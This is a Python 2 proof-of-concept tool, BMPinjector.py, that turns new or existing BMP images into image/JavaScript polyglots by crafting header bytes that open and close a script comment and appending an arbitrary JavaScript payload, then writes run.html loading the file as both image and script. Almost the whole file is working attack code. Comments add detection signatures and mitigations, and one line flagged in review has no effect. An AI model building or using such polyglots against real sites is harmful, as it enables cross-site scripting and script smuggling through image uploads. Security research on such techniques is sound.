
BMPinjector.py

  1. #!/usr/bin/env python2
  2. #============================================================================================================#
  3. #======= Simply injects a JavaScript Payload into a BMP. ====================================================#
  4. #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
  5. #======= Author: marcoramilli.blogspot.com ==================================================================#
  6. #======= Version: PoC (don't even think to use it in development env.) ======================================#
  7. #======= Disclaimer: ========================================================================================#
  8. #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
  9. #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  10. #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  11. #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
  12. #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  13. #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  14.                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  15.                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
  16. #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
  17. #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  18. #POSSIBILITY OF SUCH DAMAGE.
  19. #===========================================================================================================#
  20. import argparse
  21. import os
  22.  
  23. #---------------------------------------------------------
def _hexify(num):
    """
    Convert an integer to a raw byte string, most significant byte first.

    The value is rendered as hexadecimal text, given one leading '0' when the
    digit count is odd, and decoded with the Python 2 'hex' codec.  The result
    is only as long as the value requires (one byte for values below 256); it
    is not padded to a fixed field width.
    """
    num = "%x" % num  # hexadecimal text, most significant digit first
    if len(num) % 2:
        # the 'hex' codec consumes whole bytes, so the digit count must be even
        num = '0'+num
    return num.decode('hex')  # Python 2 only: str.decode('hex') yields raw bytes
  32.  
  33. #---------------------------------------------------------
  34. #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
  35. #;alert(_0xe428[0]);"
def _generate_and_write_to_file(payload, fname):
    """
    Write a new file made of a BMP-style header followed by the script text.

    payload -- script source, written verbatim after the header
    fname   -- output path; an existing file is truncated ("wb")

    Always returns True; errors from open()/write() propagate to the caller.

    What the output looks like (useful when triaging a suspicious image):
    the file starts with 42 4D 2F 2A ("BM" followed by a slash and a star),
    the header ends with 2A 2F 3D 31 3B (star, slash, "=1;"), and everything
    after that is plain script text rather than pixel data.

    Mitigation: a file like this is only interpreted as script when a page
    loads it through a script element and the browser accepts the response.
    Serving user-supplied images with an accurate image Content-Type together
    with "X-Content-Type-Options: nosniff", and re-encoding uploads on the
    server, keeps the trailing text from being treated as script.
    """
    f = open(fname, "wb")
    header = (b'\x42\x4D'  # signature "BM"
                        b'\x2F\x2A\x00\x00' # file-size field; its first two bytes spell "/*", which a script parser reads as a comment opener
                        b'\x00\x00\x00\x00' # reserved
                        b'\x00\x00\x00\x00' # bitmap data offset
                        b''+ _hexify( len(payload) ) + # labelled "bitmap header size" by the author; holds len(payload) as produced by _hexify
                      b'\x00\x00\x00\x14' # width, author's label: 20 pixels
                        b'\x00\x00\x00\x14' # height, author's label: 20 pixels
                      b'\x00\x00' # number of planes
                        b'\x00\x00' # bits per pixel
                        b'\x00\x10\x00\x00' # compression type
                        b'\x00\x00\x00\x00' # image size (author notes it is ignored)
                        b'\x00\x00\x00\x01' # horizontal resolution
                        b'\x00\x00\x00\x01' # vertical resolution
                        b'\x00\x00\x00\x00' # number of colours
                        b'\x00\x00\x00\x00' # number of important colours
                        b'\x00\x00\x00\x80' # palette colours (kept by the author for format compliance)
                        b'\x00\x80\xff\x80' # palette colours
                        b'\x80\x00\xff\x2A' # palette colours; the final byte 0x2A is the "*" of the closing "*/"
                        b'\x2F\x3D\x31\x3B' # "/=1;" -- with the preceding 0x2A this closes the comment and completes "BM/*...*/=1;"
                        )
    # Header and payload are written in two explicit steps (author's choice).
    f.write(header)
    f.write(payload)
    f.close()
    return True
  66.  
  67. #---------------------------------------------------------
def _generate_launching_page(f):
    """
    Write run.html, a local test page that references the file twice.

    f -- file name placed in both the img src and the script src attribute;
         it is concatenated into the markup as-is, without escaping

    The page is written to "run.html" in the current working directory,
    overwriting any existing file.  Always returns True.

    The page exists to show the same bytes being requested once as an image
    and once as a script.  Whether the script request is honoured depends on
    the Content-Type the file is served with and on the browser's MIME checks.
    """

    # The markup below is a runtime string; its whitespace is part of the output.
    htmlpage ="""
                                <html>
                                <head><title>Opening an image</title> </head>
                                <body>
                                    <img src=\"""" + f + """\"\>
                                    <script src= \"""" + f + """\"> </script>
                                </body>
                                </html>
                        """
    html = open("run.html", "wb")  # fixed output name, relative to the working directory
    html.write(htmlpage);
    html.close()
    return True
  86.  
  87. #---------------------------------------------------------
def _inject_into_file(payload, fname):
    """
    Modify an existing BMP in place and append the script text to it.

    payload -- script source appended after the image data
    fname   -- path of the BMP to modify; the file is rewritten in place

    Always returns True; I/O errors propagate to the caller.

    Resulting artifact (useful for detection): the original image bytes with
    offsets 2-3 overwritten by 2F 2A, followed by the marker
    FF 2A 2F 3D 31 3B and then plain script text after the image data.
    A BMP whose length exceeds what its header describes, or that carries
    printable script text after the pixel array, matches this pattern.

    NOTE: if the BMP contains \xFF\x2A might cause issues
    """
    # The author notes this could be done in memory in one pass; the file is
    # instead opened three times (read, rewrite, append).
    f = open(fname, "r+b")
    b = f.read()  # whole file is read into memory
    # NOTE(review): the return value of replace() is not assigned, so `b`
    # is unchanged by this line.
    b.replace(b'\x2A\x2F',b'\x00\x00')
    f.close()

    f = open(fname, "w+b")  # truncates the file, then writes the bytes back
    f.write(b)
    f.seek(2,0)  # offset 2 from the start: first bytes of the file-size field
    f.write(b'\x2F\x2A')  # overwrite two bytes with "/*"
    f.close()

    f = open(fname, "a+b")  # append mode: everything below lands after the image data
    f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')  # 0xFF then "*/=1;"
    f.write(payload)
    f.close()
    return True
  111.  
  112.  
  113. #---------------------------------------------------------
if __name__ == "__main__":
    # Command-line entry point: two positional arguments (target file name and
    # script text) and one optional flag selecting in-place modification.
    parser = argparse.ArgumentParser()
    parser.add_argument("filename",help="the bmp file name to be generated/or infected")
    parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
    parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
    args = parser.parse_args()
    # The author's legal banner is printed on every run, before any file is touched.
    print("""
                    |======================================================================================================|
                    | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
                    | It is the end user's responsibility to obey all applicable local, state and federal laws.            |
                    | Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
                    |======================================================================================================|
                    """)
    # With -i the named file is modified in place; without it a new file is
    # created (and an existing file of that name is overwritten).
    if args.inject_to_existing_bmp:
         _inject_into_file(args.js_payload, args.filename)
    else:
        _generate_and_write_to_file(args.js_payload, args.filename)
   
    # In both modes run.html is (re)written in the current working directory.
    _generate_launching_page(args.filename)
    print "[+] Finished!"  # Python 2 print statement